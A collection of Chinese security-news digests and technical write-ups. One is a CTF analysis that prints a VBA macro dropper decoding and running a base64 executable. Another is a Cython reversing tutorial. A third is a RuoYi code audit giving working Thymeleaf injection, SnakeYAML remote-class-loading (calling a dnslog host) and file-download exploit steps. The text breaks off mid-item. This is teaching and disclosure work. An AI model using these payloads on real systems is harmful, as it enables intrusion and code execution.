1、Fog勒索软件利用SonicWall VPN漏洞入侵企业网络 https://arcticwolf.com/resources/blog/arctic-wolf-labs-observes-increased-fog-and-akira-ransomware-activity-linked-to-sonicwall-ssl-vpn/ 最近，Fog和Akira勒索软件团伙通过SonicWall VPN账户，利用CVE-2024-40766漏洞，频繁侵入企业网络。SonicWall在2024年8月底修复了该漏洞，并在随后一周警告称该漏洞已被积极利用。最新的报告指出，Akira和Fog勒索软件行动至少进行了30次入侵，这些入侵都始于通过SonicWall V 2、研究人员监测到针对SPIP CMS的新攻击 https://cyble.com/blog/cyble-sensors-detect-new-attacks-on-cms-iot-exploits-continue/ 研究人员近期报告了针对开源SPIP内容管理系统的新一轮网络攻击，同时，物联网设备及其他漏洞的利用活动也在持续进行。根据研究人员的每周传感器情报报告，活跃攻击活动涉及多个已知漏洞，其中包括新发现的针对SPIP CMS的攻击。此漏洞存在于SPIP版本4.3.2、4.2.16和4.1.18之前，具体为CVE-2024-8517的命令注入问题。攻击者可以通过发送特制的多部分文件上传HTTP请求，远程执行任意操作系统命令。此外，报告 3、AWS CDK漏洞可能导致用户账户被接管 https://www.aquasec.com/blog/aws-cdk-risk-exploiting-a-missing-s3-bucket-allowed-account-takeover/ 近期，研究人员披露了影响亚马逊网络服务（AWS）Cloud Development Kit（CDK）的安全漏洞，该漏洞在特定情况下可能导致账户接管。研究人员指出，攻击者在某些情况下可能获得目标AWS账户的管理访问权限，从而实现完全控制。该问题于2024年6月27日被负责任地披露，并在2024年7月发布的CDK版本2.149.0中得到修复。该漏洞与AWS的“影子资源”相关，利用了AWS简单存储服务（ 4、四名REvil勒索软件成员在俄被判刑 https://www.kommersant.ru/doc/7263987 四名REvil勒索软件组织的前成员在俄罗斯被判处多年监禁，此次判决标志着俄罗斯境内对黑客和洗钱活动的少见定罪。这四名男子分别是阿尔忒弥斯·扎耶茨（Artem Zaets）、阿列克谢·马洛泽莫夫（Alexei Malozemov）、达尼尔·普齐列夫斯基（Daniil Puzyrevsky）和鲁斯兰·汉斯维亚罗夫（Ruslan Khansvyarov）。他们因非法支付处理被定罪，普齐列夫斯基和汉斯维亚罗夫还因使用和传播恶意软件而受到指控。据俄罗斯媒体《生意人报》报道，圣彼得堡驻军军事法庭于10月25日宣布了对这四人的判决 5、LinkedIn平台违反了多项GDPR原则被罚3.1 亿欧元 https://thecyberexpress.com/linkedin-fined-310-million-by-irish-dpc/ 近日， DPC公开表示，LinkedIn 平台违反了多项 GDPR 原则，决议对 LinkedIn 处以 3.1 亿欧元（约23.8亿人民币）的罚款，引发了人们对公司如何处理用户数据的广泛关注。 6、Pwn2Own大会：三星Galaxy S24的漏洞被利用 https://securityaffairs.com/170221/hacking/pwn2own-ireland-2024-day-two.html NCC集团的安全人员Ken Gannon在Pwn2Own大会现场展示，他通过链接五个漏洞成功黑入了一台三星Galaxy S24设备，并获取了shell以及安装了一个应用程序。 7、Google Play上超过 200 个恶意应用被下载了数百万次 https://www.4hou.com/posts/VW59 Android 官方商店 Google Play 在一年内传播了 200 多个恶意应用程序，累计下载量接近 800 万次 8、《2024年微软数字防御报告》全球每天网络攻击超6亿次 https://www.freebuf.com/news/413704.html 《2024年微软数字防御报告》揭示了一个复杂的全球网络安全格局，每天发生超过6亿次网络攻击。报告强调了勒索软件、网络钓鱼和身份泄露事件的增加，以及网络犯罪团伙和国家行为者之间的合作。 9、俄罗斯 APT29 模仿 AWS 域窃取 Windows 凭证 https://www.darkreading.com/cyberattacks-data-breaches/russias-apt29-aws-windows-credentials 克里姆林宫情报部门开展了大规模的网络钓鱼活动，这与通常的更有针对性的行动形成鲜明对比。 10、新的 Windows 驱动程序签名绕过允许安装内核rootkit https://www.bleepingcomputer.com/news/security/new-windows-driver-signature-bypass-allows-kernel-rootkit-installs 攻击者可以降级 Windows 内核组件以绕过驱动程序签名强制等安全功能，并在完全修补的系统上部署 rootkit。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

该题目贴合实际，在实战中经常遇到此类宏病毒。 将Office文档中嵌入以VBA(Visual Basic forApplications)编写的宏代码脚本，当运行Office文档时，便可以执行各种命令。 VBA脚本文件重定向能够将脚本默认文件vbaProject.bin进行替换，在打开文本时加载其他文件，增加分析者的分析复杂程度。 1、初步分析 在 Office 2007 之后的 Office 文档格式采用的是 OOXML 标准格式。那什么是OOXML 标准？这里的 OOXML 的全称是 Office Open XML File Formats或被称为 OpenXML 格式，这是一个基于 zip+xml定义的文档格式。简单的说就是Office文档是一些xml文档压缩文件，因此我们将一个word文档进行zip解压，可以获得一些xml文件 打开发现是一堆乱码，此时就需要借助大佬们的工具了。 2、oletools oletools对该文件进行分析，oletools将宏源码完整的还原了出来。 官网：https://github.com/decalage2/oletools/releases 这里采用pip安装模式 pip install -U oletools 运行命令 olevba -c protected_secret.docm > code.vbs 3、分析vbs代码 直接搜索：AutoOpen 里面有太多垃圾代码了 首先将输入的flag异或7 有点意思了，解码exe的base64编码，然后运行exe执行操作，最后再删除exe程序 4、运行Vbs得到exe 将重要的代码拿出来，然后生成exe Set fso = CreateObject("Scripting.FileSystemObject") Set objShell = CreateObject("WScript.Shell") /* 省略了一大堆 base64赋值串 */ tempPath = "D:\temp11\temp" Set tempfile = fso.CreateTextFile(tempPath, True) fso.GetFile(tempPath).Attributes = 2 tempfile.WriteLine xpkdb tempfile.Close batPath = "D:\temp11\temp.bat" Set batFile = fso.CreateTextFile(batPath, True) fso.GetFile(batPath).Attributes = 2 batFile.WriteLine "@echo off" batFile.WriteLine "certutil -decode temp1 temp|certutil -decode temp temp.exe" batFile.Close Set objExec = objShell.Exec(batPath) 保存为vbs运行，但是我电脑有点小问题没跑运行起来 因此我们采取另一种方法，直接将base64提取出来 代码很简单，将提取出来的代码放进Cyberchef进行提取即可 assets/download-20240908163140-1jiyyj2.exe5、分析exe 很简单的代码，就是位移 6、解密 v9 = [0]*54 v9[0] = 4288 v9[1] = 4480 v9[2] = 5376 v9[3] = 4352 v9[4] = 5312 v9[5] = 4160 v9[6] = 7936 v9[7] = 5184 v9[8] = 6464 v9[9] = 6528 v9[10] = 5632 v9[11] = 3456 v9[12] = 7424 v9[13] = 5632 v9[14] = 6336 v9[15] = 6528 v9[16] = 6720 v9[17] = 6144 v9[18] = 6272 v9[19] = 7488 v9[20] = 6656 v9[21] = 7296 v9[22] = 7424 v9[23] = 2432 v9[24] = 2432 v9[25] = 2432 v9[26] = 5632 v9[27] = 4416 v9[28] = 3456 v9[29] = 7168 v9[30] = 6528 v9[31] = 7488 v9[32] = 6272 v9[33] = 5632 v9[34] = 3520 v9[35] = 6208 v9[36] = 5632 v9[37] = 4736 v9[38] = 6528 v9[39] = 6400 v9[40] = 7488 v9[41] = 3520 v9[42] = 5632 v9[43] = 5184 v9[44] = 3456 v9[45] = 7488 v9[46] = 7296 v9[47] = 3200 v9[48] = 6272 v9[49] = 7424 v9[50] = 2432 v9[51] = 2432 v9[52] = 2432 v9[53] = 7808 flag = '' for i in range(54):   flag += chr(v9[i] >> 6 ^ 7) print(flag)

1、Grandoreiro银行木马采用反检测新手段发起攻击 https://securelist.com/grandoreiro-banking-trojan/114257/ 近日，研究人员发现Grandoreiro银行木马的最新变种，具有更强的反检测功能，延续其全球攻击银行用户的趋势。研究人员报告指出，尽管部分成员已被捕，但剩余的操作者持续开发新功能，包括命令与控制域生成算法（DGA）、加密技巧及鼠标追踪功能等。Grandoreiro主要通过网络钓鱼和恶意广告分发，利用假装为驱动程序的大型可执行文件绕过沙箱检测。新版本还能识别多种防病毒和银行安全软件、监控用户活动并实施加密货币转账劫持。Grandoreiro木马的不断演化对银行业构成严峻挑战，尤其 2、LinkedIn上求职者遭遇新型网络钓鱼骗局 https://www.malwarebytes.com/blog/news/2024/10/linkedin-bots-and-spear-phishers-target-job-seekers 近期观察表明，犯罪分子在LinkedIn上利用求职者发布的“#opentowork”等标签，以虚假招聘的方式实施定向网络钓鱼。通过伪造的LinkedIn账号或通过高级InMail功能发送定制化的求职邀请，攻击者以收集敏感信息为目的，使用AI生成的头像和知名公司的名称增加可信度。常见操作包括利用缩短链接诱导受害者访问伪造的工作页面，并在此页面加载Rockstar2FA等钓鱼工具包以窃取Google账 3、Fortinet披露被积极利用的零日漏洞 https://www.runzero.com/blog/how-to-find-fortimanager-instances-on-your-network/ Fortinet日前披露其FortiManager管理平台存在一个被积极利用的零日漏洞（CVE-2024-47575），可使远程攻击者执行任意代码或命令。该漏洞风险评分高达9.8，允许任何设备通过伪造证书轻松连接到FortiManager，并利用自动化脚本窃取关联设备的IP地址、凭证和配置等敏感信息。美国网络安全和基础设施安全局（CISA）已将该漏洞列入已知漏洞目录，要求联邦机构在三周内完成补丁更新或采取缓解措施。Fortinet建 4、黑客窃取3.5亿Hot Topic用户数据索要赎金10万美元 https://www.infostealers.com/article/largest-retail-breach-in-history-350-million-hot-topic-customers-personal-and-payment-data-exposed-as-a-result-of-infostealer-infection/ 一名自称“Satanic”的黑客宣称窃取了时尚品牌Hot Topic约3.5亿名客户的数据，包括姓名、邮箱、地址、出生日期以及部分支付信息。此次攻击可能源于零售分析公司Robling员工设备感染恶意软件的事件。虽然攻击者仅掌握信用卡后四位和部分加密信 5、Pwn2Own中QNAP、Synology等设备曝多项零日漏洞 https://www.bleepingcomputer.com/news/security/qnap-synology-lexmark-devices-hacked-on-pwn2own-day-3/ 在2024年Pwn2Own爱尔兰黑客大赛第三日中，白帽黑客们揭露了11个零日漏洞，为奖金池新增12.47万美元，总奖金累计至87.49万美元。当天亮点包括Viettel Cyber Security、DEVCORE团队和PHP Hooligans/Midnight Blue等参赛团队的精彩表现。其中，Viettel的Ha The Long与Ha Anh Hoang利用命令注入漏洞攻破QNAP 6、Change Healthcare数据泄露事件影响1亿美国人 https://www.bleepingcomputer.com/news/security/unitedhealth-says-data-of-100-million-stolen-in-change-healthcare-breach/ UnitedHealth集团确认，其子公司Change Healthcare因今年2月的勒索软件攻击导致超过1亿人医疗数据被窃，成为近年来最大规模的医疗数据泄露事件。此次攻击由BlackCat（也称ALPHV）勒索团伙实施，利用Change Healthcare的Citrix远程访问服务的凭证漏洞侵入系统，窃取6TB数据，并加密网络中计算机，迫使公司关闭 7、Cisco修复VPN漏洞并发布多项高危漏洞补丁 https://www.bleepingcomputer.com/news/security/cisco-fixes-vpn-dos-flaw-discovered-in-password-spray-attacks/ Cisco近期修复了在密码喷射攻击中发现的VPN服务拒绝服务漏洞（CVE-2024-20481）。该漏洞影响Cisco ASA和Firepower Threat Defense（FTD）软件，使得攻击者可以通过大量VPN认证请求消耗设备资源，造成RAVPN服务中断。为避免此漏洞的影响，管理员可使用命令检查是否启用SSL VPN服务。此外，Cisco还发布了42个漏洞通告，其中 8、TeamTNT黑客组织发起新一轮云攻击进行加密货币挖矿 https://www.aquasec.com/blog/threat-alert-teamtnts-docker-gatling-gun-campaign/ 臭名昭著的加密劫持组织TeamTNT正针对云原生环境展开大规模攻击，目标是挖掘加密货币并将入侵的服务器租给第三方。研究人员表示，该组织利用暴露的Docker守护程序部署Sliver恶意软件、网络蠕虫和加密矿工，使用受感染的服务器和Docker Hub作为传播基础设施。TeamTNT不仅利用Docker Hub托管和分发恶意负载，还通过将受害者的计算能力出租以进行非法加密货币挖矿，展现出其多样化的盈利策略。攻击过程中，黑客通过massc 9、新Windows驱动签名绕过漏洞允许内核Rootkit安装 https://www.safebreach.com/blog/update-on-windows-downdate-downgrade-attacks/ 攻击者通过降级Windows内核组件，绕过驱动签名强制（DSE），在完全修补的系统上部署Rootkits。研究人员发现并演示了这一攻击手法，该攻击利用Windows Update过程引入过时的、易受攻击的软件组件，而不改变系统的完全修补状态。研究工具Windows Downdate允许定制降级，使系统暴露于已修复的漏洞。攻击者可用此方法加载未签名的内核驱动，绕过安全控制并隐藏恶意活动。尽管内核安全性显著提升，此攻击显示降级组件仍简化了攻击 10、Wi-Fi联盟测试套件发现命令注入漏洞影响路由器安全 https://kb.cert.org/vuls/id/123336 研究人员发现Wi-Fi联盟的测试套件中存在命令注入漏洞（CVE-2024-41992），该漏洞允许未经认证的本地攻击者以提升的权限执行任意代码。CERT协调中心指出，受影响的代码已部署在Arcadyan FMIMG51AX000J路由器上。攻击者可通过发送精心构造的数据包利用此漏洞，在受影响的路由器上以root权限执行任意命令。Wi-Fi测试套件旨在自动化Wi-Fi设备的测试，尽管其开源组件可公开获取，但完整版本仅限会员使用。独立研究人员“fj016”发现并报告了此安全缺陷，并提供了漏洞的概念验证（PoC）利用工具。CER 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

Python代码转换为C代码的时候，将会大大增加框架代码量。 https://moonlet.gitbooks.io/cython-document-zh_cn/content/ch1-basic_tutorial.html1、正向py->c 先有正向，再有逆向 pip install cython 写一个简单的pyx文件 .pyx 文件是由 Cython 编程语言 "编写" 而成的 Python 扩展模块源代码文件 print("hello") 写一个 setup.py文件 from distutils.core import setup from Cython.Build import cythonize setup(   ext_modules = cythonize("test.pyx") ) 使用命令开始编译 python setup.py build_ext --inplace 生成如下文件 打开test.c发现有几千行代码 单纯的一行python代码，生成为c代码就几千行 调用so文件 2、逆向分析 2.1 字符串类型 _Pyx_CreateStringTabAndInitStrings 全局字符串赋值一般在_Pyx_CreateStringTabAndInitStrings 中，该函数中使用的字符串定义数组形如： typedef struct {     PyObject **p;     const char *s;     const Py_ssize_t n;     const char* encoding;     const char is_unicode;     const char is_str;     const char intern; } __Pyx_StringTabEntry; 而字符串是通过__Pyx_StringTabEntry 的数组进行初始化的，也就是说当我们在该函数中看到以下伪代码时： v8 = _mm_unpacklo_epi64(&qword_28A98, "AttributeError"); v9 = 15LL; v10 = 0LL; v11 = 0x100; v12 = 1; 就代表这是一个{&qword_28A98, "AttributeError", 15, 0, 1, 0, 1} 的__Pyx_StringTabEntry ，也就是说qword_28A98 中将要初始化一个内容是"AttributeError" 的字符串对象的地址，在后续调用中，调用到AttributeError字符串的地方都会用&qword_28A98 指代 2.2 整数类型 _pyx_pymod_exec_chal qword_29170 = PyLong_FromLong(113LL, v9, v244, v245); if ( qword_29170 ) qword_29170 中将存储一个值为113 的整数类型的Python对象。 qword_29600 = PyLong_FromString("2654435769", 0LL, 0LL); if ( qword_29600 ) 大数会用PyLong_FromString 函数来初始化，这里qword_29600 中将存储一个值为2654435769 的整数类型的Python对象，后续用到2654435769的地方将使用qword_29600 。 2.3 import写法 v539 = _Pyx_ImportDottedModule_constprop_0(random); if ( PyDict_SetItem(_pyx_mstate_global_static, random, v539) < 0 ) { 导入``random``模块，同``import random 3、实战分析 这里提供一道自己出的题目，采用了RC4加密，流程很简单。 让我们开干 把提供的so文件拖进IDA中 而且这个函数 _Pyx_CreateStringTabAndInitStrings() 非常大，不能反编译 目前不知道这个函数的加密，我们先打印其相关的属性，看看能不能找到蛛丝马迹 import test dir(test) 发现是RC4加密，这样逻辑就清晰了 所以现在的目标是获得RC4的秘钥和密文咯，假设RC4没有魔改 刚才我们在函数_Pyx_CreateStringTabAndInitStrings 找到了非常类似密文的值 9d7422eabf8baf369c09121f02e940099d9c6b538d88e30aac08 但是没有找到 秘钥，说明秘钥可能就不是字符串，而是byte类型！ 我们先搜索RC4相关函数 发现代码非常多，暂时先不去分析RC4算法 看看哪里调用了我们的RC4算法 函数：_pyx_pymod_exec_test 但是byte类型怎么初始化呢？ 我们编写一个demo，然后反编译去查看初始化方式即可 demo.pyx key = b'mykekekeke' en_flag = b'12312312312312' demo_setup.pyx from distutils.core import setup from Cython.Build import cythonize setup(   ext_modules = cythonize("demo.pyx") ) 运行命令 python demo_setup.py build_ext --inplace 先看看c文件 还是很清晰的，直接IDA分析so文件 发现byte类型也存储在函数_Pyx_CreateStringTabAndInitStrings 所以我们再翻阅一下，成功找到类似key的代码 DASCTF{cpython_is_so_easy}

1、Lazarus黑客利用虚假DeFi游戏对个体发起攻击 https://securelist.com/lazarus-apt-steals-crypto-with-a-tank-game/114282/ Lazarus黑客组织通过一个假冒的去中心化金融（DeFi）游戏，利用了Google Chrome的零日漏洞CVE-2024-4947，针对加密货币领域的个体展开攻击。该攻击最早由Kaspersky于2024年5月发现，并向Google报告了该漏洞。Lazarus使用了名为"Manuscrypt"的后门恶意软件，并通过一个名为DeTankZone的NFT在线游戏网站传播，该网站伪装成一款多人坦克对战游戏，实则暗中利用Chrome漏洞执行远程代码。 2、勒索软件攻击冒用LockBit名声以恐吓受害者 https://www.trendmicro.com/en_us/research/24/j/fake-lockbit-real-damage-ransomware-samples-abuse-aws-s3-to-stea.html 最近的勒索软件攻击中，攻击者利用亚马逊S3加速功能窃取数据，并伪装其勒索软件为臭名昭著的LockBit，以加剧对受害者的威胁。据研究人员研究，攻击者在勒索软件中嵌入了硬编码的AWS凭证，通过S3存储加速功能将窃取的数据上传到其控制的云存储桶。此勒索软件能够攻击Windows和macOS系统，并加密特定文件，随后更改设备壁纸以展示LockBit 2.0的名称。此举 3、流行应用暴露云密钥致数百万iOS和Android用户面临风险 https://www.security.com/threat-intelligence/exposing-danger-within-hardcoded-cloud-credentials-popular-mobile-apps 研究人员发现，数百万iOS和Android用户的敏感数据因流行应用中的硬编码云服务密钥而面临泄露风险。开发者在应用代码中嵌入未加密的云服务凭证，如AWS和Azure密钥，容易被攻击者利用，从而造成数据泄露和服务中断。受影响的Android应用包括下载量超500万的Pic Stitch，以及Meru Cabs和Sulekha Business等；iOS应用如Crum 4、苹果、特斯拉均受影响，新型漏洞迫使GPU无限循环直至系统崩溃 https://www.freebuf.com/news/413576.html 近日，Imperva 研究人员发现了一个名为 ShadyShader 的漏洞。该漏洞允许攻击者反复冻结苹果设备的 GPU，最终可能导致系统崩溃。 5、Mallox 勒索软件漏洞让受害者无需支付赎金即可恢复文件 https://cybersecuritynews.com/mallox-ransomware-decrypted/ 该漏洞影响了整个 2023 年和 2024 年初活动的恶意软件版本，尽管攻击者在 2024 年 3 月对其进行了修补。 6、日本电产精密公司披露安全事件和数据泄露情况 https://www.anquanke.com/post/id/301244 日本电产精密株式会社（Nidec Precision Corporation）是一家领先的精密电机和零部件制造商，该公司最近公布了影响其越南子公司 Nidec Precision Vietnam Corporation (NPCV) 的安全事件详情。该事件发生于 2024 年 8 月 5 日，涉及外部犯罪团伙未经授权访问 NPCV 的网络。 7、Nvidia 修补了Windows、Linux驱动程序中的严重漏洞 https://www.securityweek.com/nvidia-patches-high-severity-flaws-in-windows-linux-graphics-drivers/ 科技巨头 Nvidia 推出了紧急安全更新，以修复 Windows 和 Linux 的 GPU 驱动程序及其虚拟 GPU (vGPU) 软件中的至少 8 个高严重性漏洞。 8、朝鲜黑客利用 Chrome 零日漏洞盗窃加密货币 https://www.securityweek.com/north-korean-hackers-exploited-chrome-zero-day-for-cryptocurrency-theft/ 据卡巴斯基报道，朝鲜高级持续威胁 (APT) 攻击者 Lazarus 被发现利用 Chrome 中的零日漏洞从虚假游戏网站的访问者那里窃取加密货币。 9、VMware 发布vCenter Server更新以修复严重RCE 漏洞 https://thehackernews.com/2024/10/vmware-releases-vcenter-server-update.html VMware 发布了软件更新，以解决 vCenter Server 中已修补的安全漏洞，该漏洞可能为远程代码执行铺平道路。该漏洞编号为CVE-2024-38812 （CVSS 评分：9.8），涉及 DCE/RPC 协议实现中的堆溢出漏洞。 10、BattlEye 漏洞：“BannleEye”漏洞允许任意禁止用户 https://securityonline.info/battleye-vulnerability-bannleeye-exploit-allows-arbitrary-banning-users/ 广泛使用的反作弊系统 BattlEye (BE) 中的一个严重漏洞已被披露，可能会危及多个著名在线游戏用户帐户的安全。安全研究人员timoxa565发现的该漏洞使恶意行为者能够利用系统的身份验证过程并触发非法帐户禁令。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、恶意npm软件包窃取以太坊私钥并植入SSH后门 https://blog.phylum.io/trojanized-ethers-forks-on-npm-attempting-to-steal-ethereum-private-keys/ 研究人员发现了一系列发布在npm注册表中的恶意软件包，这些软件包旨在窃取开发者的以太坊私钥，并通过SSH协议远程访问受害者机器。据研究人员的分析，这些恶意包会通过将攻击者的SSH公钥写入根用户的“authorized_keys”文件，从而获取SSH访问权限。这些恶意软件包模仿了合法的ethers库，包括ethers-mew、ethers-web3等，最新且最完整的为ethers-mew。与此前类似攻击 2、攻击者利用Docker API服务器进行SRBMiner挖矿攻击 https://www.trendmicro.com/en_us/research/24/j/using-grpc-http-2-for-cryptominer-deployment.html 根据研究人员的最新发现，网络犯罪分子正在利用Docker远程API服务器，部署SRBMiner加密挖矿程序来非法挖掘XRP加密货币。攻击者通过gRPC协议和h2c协议升级绕过安全措施，远程操控Docker主机。他们首先检查Docker API的可用性和版本，然后使用gRPC方法操控Docker环境，创建容器并执行加密挖矿操作。此外，攻击者还利用公开暴露的Docker API服务器部署perfctl恶意 3、Polyfill供应链攻击与大规模赌博网站网络存在关联 https://www.silentpush.com/blog/triad-nexus-funnull/ 研究人员发现，2024年发生的一次大型数字供应链攻击源于一家名为FUNNULL的小公司。该公司接管了Polyfill.io，一个为旧浏览器提供新功能的开源JavaScript库，并利用其访问权向成千上万的网站注入恶意软件，重定向用户至一个庞大的赌博网站网络。研究人员的报告表明，FUNNULL通过Polyfill.io将访客转向约4万个自动生成的赌博网站，这些网站多为仿冒著名赌场品牌，如威尼斯人、Bet365等。研究还表明，该网络可能是为了进行资金洗钱操作，相关开发者的GitHub账户和T 4、Win Server WinReg漏洞可被利用进行NTLM中继攻击 https://www.akamai.com/blog/security-research/winreg-relay-vulnerability 研究人员公开了CVE-2024-43532漏洞的概念验证代码，该漏洞利用了Windows注册表客户端的身份验证降级机制，允许攻击者通过NTLM中继攻击接管Windows域。该漏洞影响Windows Server 2008至2022版本，以及Windows 10和11操作系统。当SMB传输不可用时，WinReg客户端会回退到旧协议，使用较弱的身份验证级别，攻击者可通过此漏洞获取域用户证书并创建管理员账户。微软已于2024年7月发布修复补丁，研究人员建 5、攻击者正滥用Gophish传播远程访问木马程序 https://www.freebuf.com/news/413485.html 名为Gophish 的开源网络钓鱼工具包正被攻击者用来制作DarkCrystal RAT（又名 DCRat）和PowerRAT 远程访问木马，目标针对俄国用户。 6、三星设备曝出高危零日漏洞，已被小范围利用 https://www.freebuf.com/news/413479.html 谷歌威胁分析小组（TAG）警告称，三星存在一个零日漏洞，被追踪为 CVE-2024-44068（CVSS 得分为 8.1），且该漏洞已被发现存在被利用的情况。 7、高通64款芯片存在0Day漏洞 https://www.freebuf.com/news/413449.html 近日，高通公司发布了一项重要的安全警告，揭示了其多达64款芯片组存在严重的“0Day漏洞”。这一漏洞被标识为CVE-2024-43047，影响广泛，波及多个搭载骁龙芯片的Android智能手机和平板电脑、物联网设备等多个领域。 8、K8s曝9.8分漏洞，黑客可获得Root访问权限 https://www.freebuf.com/news/413438.html 近日，安全研究人员Nicolai Rybnikar 发现Kubernetes镜像构建器中存在严重安全漏洞（CVE-2024-9486 ，CVSS ：9.8），攻击者可在特定情况下获得Root级访问权限，从而导致系统出现问题。 9、Meta 重启面部识别技术，打击“假名人”诈骗 https://www.ithome.com/0/804/079.htm 据路透社报道，当地时间 22日，在因隐私和监管压力于三年前关闭 Facebook 的面部识别功能后，Meta 目前宣布正在重新测试该服务，以打击“名人诱饵”诈骗。 10、分析显示，没有一个大型 AI 模型符合欧盟监管标准 https://cybernews.com/ai-models-eu-regulatory-standards/ 根据一项新的研究，在 12 个领先的大型语言模型中，OpenAI 的 GPT-4 Turbo 最接近满足欧盟的人工智能规则，但仍未完全合规。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

环境布置： 到官网下载源码：https://github.com/yangzongzhuan/RuoYi 采用phpstudy集成数据库，5.7版本。JDK1.8。 IDEA打开项目，等待自动加载，修改application-druid.yml配置文件：数据库名，账号密码，连接数据库，修改application.yml中的端口，避免与80端口冲突。 导入：quartz.sql与ry_20201214.sql文件。 运行RuoYiApplication文件。 访问后台：http://localhost:25001/login Sql注入漏洞： 由于该项目采用了mybatis开发，常见的找sql注入的方法就是全局搜索${ 定位到可疑参数： 根据id值selectRoleList全局搜索，从xml定位到dao层： 右键单击，找该接口的使用，在使用处发现selectRoleList方法，全局搜索该方法，定位controller层查看接口与传参： 如下，定位到controller层： 分析代码：首先以@RequiresPermissions注解表明接口访问权限，再以@PostMapping注解表明接收接口，并且以@ResponseBody注解表明回将返回值写入http响应。 此方法会接收一个SysRole类型的role值，并且将接受的role值以selectRoleList方法处理后返回给list，最后返回给http响应。 于是我们现在需要分析 1：role对象在接收它的参数时是否有过滤， 2：selectRoleList方法在处理role接收后的值是否有过滤。 跟进SysRole类，发现无过滤： 跟进selectRoleList方法，发现无过滤： 于是确定原dataScope参数存在sql注入，到前端功能找对应数据包。 发现不存在dataScope参数,手动添加： 将localhost换成主机IP，放入sqlmap验证 Shiro反序列化： 首先查看项目pom文件，发现shiro版本为1.7.0： 全局搜索cipherKey，定位到密钥值： 由此结合shiro反序列化利用工具利用。 Shiro未授权访问： 查看shiro配置文件ShiroConfig.java，anon为匿名拦截器，不需要登录就能访问。authc为登录拦截器，需要登录认证才能访问。 Thymeleaf模板注入： 本框架采用了 Thymeleaf 模板，全局搜索:: 根据Mapping构造路径，发送poc fragment=__*%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc%22).getInputStream()).next()%7d__::.x 计划任务RCE: 如图添加计划任务 将调用目标字符修改如下： org.yaml.snakeyaml.Yaml.load(\'!!javax.script.ScriptEngineManager \[!!java.net.URLClassLoader \[\[!!java.net.URL \[\"http://w2h0ib.dnslog.cn\"\]\]\]\]\') 调用执行： dnslog出现响应： 任意文件下载漏洞： 继续如上创建定时任务： ruoYiConfig.setProfile(\'/home/clown/Project/RuoYi-v4.6.0/ruoyi-admin/src/main/resources/application.yml\') 执行后访问如下路径实现文件下载： /common/download/resource?resource=.zip 跟踪下载路径定位代码： 该处代码先接收resource的值，再将该值放入checkAllowDownload方法里面校验后，进入下载文件的代码调用。 于是跟进checkAllowDownload方法： 发现该方法主要做了两件事： 1：禁止掉resource中的目录穿越../ 2：以白名单形式检查文件下载规则 这里主要跟进一下2的代码： 取点后缀： 再以点后缀进行白名单匹配： 如果在原controller层if判断为假，进入下载文件代码流程： 至此可发现下载文件的路径不可控，且类型存在白名单限制！ 此时我们继续跟进本地资源路径的代码： 我们可以发现本地资源路径是通过getProfile进行获取，且该RuoYiConfig类存在setProfile方法，由此可知，可以通过计划任务调用该类的setProfile方法设置好路径，直接绕过了前面的if过滤： 之后即可调用/common/download/resource接口任意下载文件。

1、Bumblebee恶意软件在最近的执法行动后卷土重来 https://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence Bumblebee恶意软件在遭受欧洲刑警组织“终局行动”打击四个月后再次出现在网络攻击中。Bumblebee由TrickBot开发者创建，2022年作为BazarLoader后门的替代品出现，为勒索软件攻击者提供访问网络的入口。最新攻击链通过钓鱼邮件诱导受害者下载伪装成NVIDIA驱动或Midjourney安装程序的恶意ZIP文件，并利用PowerShell执行恶意软件。尽管攻击规模尚不明确，但Bumbl 2、CISA紧急添加ScienceLogic SL1漏洞至已被利用漏洞目录 https://thehackernews.com/2024/10/cisa-adds-sciencelogic-sl1.html 美国网络安全与基础设施安全局（CISA）于10月22日将ScienceLogic SL1平台的一个严重漏洞（CVE-2024-9537）添加至已被利用漏洞目录。此漏洞为零日攻击的目标，CVSS评分为9.3，涉及一个第三方组件的安全缺陷，可能导致远程代码执行。目前，该问题已在多个版本中修复。此前，云托管服务提供商Rackspace也因该漏洞导致其内部监控服务器遭到未授权访问。Rackspace确认，该漏洞已影响其性能报告系统，并通知受影响的客户。根据联邦规定，FC 3、信息窃取软件泛滥致网络犯罪频发 https://securelist.com/kral-amos-vidar-acr-stealers/114237/ 据研究人员的报告，2023年近千万台设备受信息窃取软件攻击，实际数字可能更高。这些窃取软件通过钓鱼邮件、恶意广告等方式传播，目标包括加密货币钱包和浏览器数据。Kral、AMOS等多种窃取软件被广泛使用，前者通过虚假广告诱导用户下载恶意文件，后者则通过伪装成合法软件侵入macOS系统。此外，Vidar与ACR这类窃取工具通过复杂的分阶段攻击获取用户数据，并以此进行进一步的网络犯罪活动。专家建议启用双因素认证，谨慎下载软件以应对此类攻击。 4、多款云存储平台存在安全漏洞，影响超2200万用户 https://www.freebuf.com/news/413364.html 据苏黎世联邦理工学院研究人员Jonas Hofmann和Kien Tuong Turong的发现，端到端加密（E2EE）云存储平台存在一系列安全问题，可能会使用户数据暴露给恶意行为者。在通过密码学分析后，研究人员揭示了Sync、pCloud、Icedrive、Seafile和Tresorit服务的问题，这些服务共同被超过2200万人使用。 5、Fortinet 发布未公开的 FortiManager 严重漏洞补丁 https://www.anquanke.com/post/id/301126 尽管建议的缓解措施可能表明问题存在于 “Fortigate to FortiManager”（fgfm）连接/通信/管理功能中，但该公司尚未公开披露与此漏洞相关的详细信息或 CVE。 6、ESET合作公司遭入侵，向以色列发送数据擦除程序 